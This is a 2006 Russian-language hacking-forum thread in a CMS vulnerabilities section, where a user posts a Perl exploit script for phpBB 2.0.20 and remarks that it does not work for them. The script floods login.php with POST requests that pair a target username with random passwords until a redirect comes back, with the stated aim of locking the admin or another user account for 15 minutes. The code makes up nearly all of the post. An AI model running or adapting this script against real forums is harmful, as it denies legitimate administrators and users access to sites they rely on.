Форумы phpBB 2.0.20 Disable Admin or User Account

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 2 May 2006.

Thread Status:
Not open for further replies.
  1. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    я нашел это.
    но не работайте для меня. :(

    Code:
    ################################################################################### 
    #!/usr/bin/perl 
    # Priv8 Exploit for PHPBB 2.0.20 
    # This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min 
    #Discover & Writ By : Hossein-Asgari 
    # http://simorgh-ev.com 
    # Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password ! 
    # BUT : 
    # If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable . 
    # Enjoy ! 
    # Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt 
    ################################################################################### 
    $host=$ARGV[0]; 
    $dirc=$ARGV[1]; 
    $port=$ARGV[2]; 
    $user=$ARGV[3]; 
    
    $dirsend = "$dirc" . "login.php"; 
    print " 
       ------------------------------------- 
       phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username > 
       -------------------------------------- 
       "; 
    $i=1; 
    if ($host ne ""){ 
    while($OK ne 1){ 
    
    
    use IO::Socket; 
    my($socket) =""; 
       if ($socket = IO::Socket::INET->new(PeerAddr => $host , 
                                           PeerPort => $port , 
                                           Proto    => "TCP")) 
    { 
    
    
    $password=rand(); 
    $data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion 
    "; 
    $length = length $data; 
    print $socket "POST $dirsend HTTP/1.1 
    Host: $host 
    Content-Type: application/x-www-form-urlencoded 
    Content-Length: $length 
    
    $data"; 
    read  $socket, $answer, 15; 
    close($socket); 
    } 
    if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;} 
    $i=$i+"1"; 
    print "$answer 
    "; 
    print "Send Packet $i .... 
    " ; 
    
    }}
    ------------------------------------------------------------------

    Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей phpBB].
     
    #1 liauliau, 2 May 2006
    Last edited by a moderator: 2 Mar 2007
Loading...
Thread Status:
Not open for further replies.